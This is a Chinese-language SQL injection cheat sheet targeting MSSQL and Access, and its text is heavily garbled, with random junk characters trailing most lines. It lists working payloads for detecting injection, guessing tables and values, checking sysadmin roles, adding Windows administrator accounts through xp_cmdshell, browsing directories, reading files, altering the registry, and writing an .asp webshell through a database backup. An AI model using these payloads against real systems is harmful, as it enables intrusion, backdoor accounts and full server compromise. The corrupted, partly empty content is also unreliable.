1.判断是否有注入;and 1=1 ;and 1=2 ��o>)��.Cj
2.初步判断是否是mssql ;and user>0 q4R5<L�W"�
�>sf�RI]OG
3.注入参数是字符'and [查询条件] and ''=' ��whmdcVh.
V�r�)<\�h�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' b�=g8e�M�m
�GQ�t8p�[!
5.判断数据库系统 gD��,1 06%
-9%:i�lX�~
;and (select count(*) from sysobjects)>0 mssql H2&@shOOQJ
��LM��$W*�
;and (select count(*) from msysobjects)>0 access �I(]��}XZq
9�8�j>1�"8
~T ]m>A�!�
�O��,J>/�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 r;/��4F/6"
�%@wJ`F2a_
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 u5O+1sZ"6�
M=%l}FSTw(
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 a��K&b�{d
U�M!E�NI|
9.(1)猜字段的ascii值(access) �I, -hf=�-
||T2~Q�*:y
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ?p9V�O.^5�
^$%��S &�W
(2)猜字段的ascii值(mssql) RS"H�8P�4W
�u�\E?Y[�1
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ;o^eC!:�/%
Gn�\�_+Pj$
10.测试权限结构(mssql) C�+?Hm�1��
�?5��U2D%t
�{G|,�\�O1
9�:fOYT�$8
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ?Y)vGlWDW<
c�;%�_EN%
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��nA?`BOe(
�N/�]�o4�o
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �V�cAue!MN
�uXI�_M�)
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- X'wE�7=29M
|>27'#�JC�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- V_>\����9m
_,zA �^�*b
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �_]04lGx27
Scp�7X�7{N
;and 1=(select IS_MEMBER('db_owner'));-- /�,��1�D)0
\X<bH&�x:z
e`@ # *}�A
�`�Y
�BC�
11.添加mssql和系统的帐户 INcg S �MM
X-
pq��w~$
;exec master.dbo.sp_addlogin username;-- 7�q��?9Tj3
;exec master.dbo.sp_password null,username,password;-- F�|F]��970
$i&e[O�7T;
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- O>qll�6]{@
`D>S;[~S7�
;exec master.dbo.xp_cmdshell 'net user username password ~Cl�){�8o
#OBJ��zf*p
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �F
;{�n"3<
.�E�pV;xq}
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �Cnn�h�7`�
^:6{2��2C{
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- W�xW7q���t
7x#�Ckep:I
�
gG
uZ8:f
<!L�>Exh&r
12.(1)遍历目录 �^w(p8G_-w
HqI �t74+�
;create table dirs(paths varchar(100), id int) yk�v94�i?Q
;E@G`=0St�
;insert dirs exec master.dbo.xp_dirtree 'c:\' pR
`�>b �3
6Ca����(U'
;and (select top 1 paths from dirs)>0 C2@��,BCR�
Ol�1�e/W�v
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) =6woWlf��b
'�=[?~0�(B
4?0vso*X<:
">~.�$Jp_4
(2)遍历目录 7Ok;Lt!x��
2}�Y�O�cnB
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �aJY��gzr,
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��z)�'M�k[
"vXxv'0�\f
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Tg!i%v(-t�
���xG}(5Tt
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 A�{UULVp�
y(�Y!?X I�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 F_Z-�� 8>P
;�} un�d*q
kd�CUORM�K
pc�au}5� .
13.mssql中的存储过程 L�AVAFlK5�
��&���F\?�
xp_regenumvalues 注册表根键, 子键 �Em��?�d*z
J��XCC�TUO
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 }ts�YJl�h5
"�[vu6�`m?
xp_regread 根键,子键,键值名 }Mo�=PWI1?
�@|��<<H3I
;exec xp_regread �:{qv~�&+C
]�G�N7+�8l
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ��s��W�)Zi
��ld3-C5�5
xp_regwrite 根键,子键, 值名, 值类型, 值 ~����(x;5{
�T;@;R���%
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 H�H�iT]S�9
W- �i&sUgy
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 |3F0��2���
A6GE�,FhsG
xp_regdeletevalue 根键,子键,值名 ��7w�
37�S
f:ZA���G4B
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �?g?�L3vRK
x�8Retu��v
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 i7I�S��X>%
kj��EEu�Ev
5nv<^�>[J
.gG1�kW�A-
14.mssql的backup创建webshell R>,:A%?^b5
io�,M{Ib��
use model i��-bJ�S�6
�@Gx.q�&�H
create table cmd(str image); 1c<�=A!"{�
A:�aE|v/T&
insert into cmd(str) values (''); B�+�[A]dgS
�/G�I�xR6i
backup database model to disk='c:\l.asp'; �s_x:�T�<]
@7��n/�Q�(
=�:D�aS`~V
� -QOw8vm�
15.mssql内置函数 �7h6,c�/<
�j{Hao�\F8
;and (select @@version)>0 获得Windows的版本号 {�����T4��
`�VKf3&|<A
;and user_name()='dbo' 判断当前系统的连接用户是不是sa {z(x��Fr�Y
bA\�<.d���
;and (select user_name())>0 爆当前系统的连接用户 YGv<VO�WG2
Yu?95qk�tP
;and (select db_name())>0 得到当前连接的数据库 ^&bRX4p�Yo
vr�0W�S�3
, #U��.j�
��@?=�|��Y
16.简洁的webshell 1U^A56CN��
Yh�Olx�ON�
use model S�|�apw7C
�m>�4ahue$
create table cmd(str image); q6_u�@:3�u
�JL\��w_v�
insert into cmd(str) values (''); 5m�?�8yT�}
xqC+0{]��y
backup database model to disk='g:\wwwtest\l.asp';
